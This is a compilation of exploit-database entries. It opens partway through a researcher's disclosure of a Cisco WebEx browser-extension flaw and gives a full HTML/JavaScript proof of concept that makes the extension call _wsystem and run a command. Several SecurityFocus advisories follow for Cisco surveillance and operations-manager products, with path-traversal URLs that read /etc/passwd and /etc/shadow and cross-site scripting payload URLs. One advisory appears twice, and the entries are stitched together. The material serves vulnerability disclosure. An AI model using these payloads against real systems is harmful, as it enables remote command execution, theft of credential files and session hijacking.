VZhbHVlKGNsaWVudHBhcmFtX05hbWUsY2xpZW50cGFyYW1fVmFsdWUpO0ZpbmlzaENhbGwoc3pDb29raWUpOw==",
If we decode those strings, we get:
GpcComponentName: "atmccli.DLL"
GpcInitCall: "szCookie=InitControl(%HWND);NameValue(LoggingURL_Name,LoggingURL);NameValue(MeetingID_Name,MeetingID);NameValue(SessionID_Name,SessionID);NameValue(GpcIniFileName_Name,GpcIniFileName);NameValue(GpcUrlRoot_Name,GpcUrlRoot);NameValue(GpcExtVersion_Name,GpcExtVersion);NameValue(GpcUnpackVersion_Name,GpcUnpackVersion);NameValue(GpcProductRoot_Name,GpcProductRoot);NameValue(localrootsectionver_Name,localrootsectionver);NameValue(RegType_Name,RegType);NameValue(GpcProgressBarTitle_Name,GpcProgressBarTitle);NameValue(GpcMessageTitle_Name,GpcMessageTitle);NameValue(downloadlocalsetting_Name,downloadlocalsetting);NameValue(productname_Name,productname);NameValue(SFSupporting_Name,SFSupporting_Value);NameValue(MeetingRandom_Name,MeetingRandom);NameValue(clientparam_Name,clientparam_Value);FinishCall(szCookie);"
That looks like some sort of weird scripting language. The presence of `HWND` suggests this is interacting with native code, and if I dump the exports of atmccli.DLL:
$ dumpbin /nologo /exports atmccli.dll
Dump of file atmccli.dll
ordinal hint RVA name
2 2 0001CC11 ExitControl
24 3 0001CC83 FinishCall
1 4 0001D2F9 InitControl <--
23 5 0001D556 NameValue
...
These exports look like the functions being called in that scripting language. Is it possible it's calling those exports?
I noticed that they ship a copy of the CRT (Microsoft's C Runtime, containing standard routines like printf, malloc, etc), so I tried calling the standard _wsystem() routime (like system(), but for WCHAR strings), like this:
var msg = {
GpcProductRoot: "WebEx",
GpcMovingInSubdir: "Wanta",
GpcProductVersion: "T30_MC",
GpcUnpackName: "atgpcdec",
GpcExtName: "atgpcext",
GpcUnpackVersion: "27, 17, 2016, 501",
GpcExtVersion: "3015, 0, 2016, 1117",
GpcUrlRoot: "http://127.0.0.1/",
GpcComponentName: btoa("MSVCR100.DLL"),
GpcSuppressInstallation: btoa("True"),
GpcFullPage: "True",
GpcInitCall: btoa("_wsystem(ExploitShellCommand);"),
ExploitShellCommand: btoa("calc.exe"),
}
Unbelievably, that worked.
Example exploit attached.
I uploaded a demo here for testing (this URL is secret)
https://lock.cmpxchg8b.com/ieXohz9t/
(You can make sure WebEx is installed and working first by going here. You don't need to register, just enter any name and email)
https://www.webex.com/test-meeting.html
-->
<html>
<head>
<title>Cisco WebEx Exploit</title>
<script>
var msg = {
GpcProductRoot: "WebEx",
GpcMovingInSubdir: "Wanta",
GpcProductVersion: "T30_MC",
GpcUnpackName: "atgpcdec",
GpcExtName: "atgpcext",
GpcUnpackVersion: "27, 17, 2016, 501",
GpcExtVersion: "3015, 0, 2016, 1117",
GpcUrlRoot: "http://127.0.0.1/",
GpcComponentName: btoa("MSVCR100.DLL"),
GpcSuppressInstallation: btoa("True"),
GpcFullPage: "True",
GpcInitCall: btoa("_wsystem(ExploitShellCommand);"),
ExploitShellCommand: btoa("calc.exe"),
}
function runcode()
{
if (!document.location.pathname.endsWith("cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html")) {
alert("document /must/ be named cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html");
return;
}
if (!document.location.protocol.endsWith("https:")) {
alert("document /must/ be served over https");
return;
}
document.dispatchEvent(new CustomEvent("connect", { detail: { token: "token" }}));
document.dispatchEvent(new CustomEvent("message", { detail: {
message: JSON.stringify(msg),
message_type: "launch_meeting",
timestamp: (new Date()).toUTCString(),
token: "token"
}
}));
}
</script>
</head>
<body onload="runcode()">
<h1>Running exploit...</h1>
</body>
</html>
source: https://www.securityfocus.com/bid/58476/info
Cisco Video Surveillance Operations Manager is prone to multiple security vulnerabilities, including:
1. Multiple local file-include vulnerabilities
2. A security-bypass vulnerability
3. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to bypass certain security restrictions to perform unauthorized actions, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the affected application.
Cisco Video Surveillance Operations Manager 6.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
http://www.example.com/monitor/logselect.php
http://www.example.com/broadware.jsp
http://www.example.com/vsom/index.php/"/title><script>alert("ciscoxss");</script>
source: https://www.securityfocus.com/bid/47901/info
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
This issue is being tracked by Cisco Bug ID CSCtn61716.
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.
http://www.example.com/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870
d5&viewname=device.filter&operation=getFilter&dojo.preventCache=129851
8961028
http://www.example.com/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>
09520eb762c&dojo.preventCache=1298518963370
source: https://www.securityfocus.com/bid/47903/info
Cisco Unified Operations Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue is being tracked by Cisco Bug ID CSCto12712.
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.
http://www.example.com/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)
source: https://www.securityfocus.com/bid/47901/info
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
This issue is being tracked by Cisco Bug ID CSCtn61716.
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.
http://www.example.com/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceC
apability=deviceCap
http://www.example.com/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c
06d&deviceCapability=deviceCap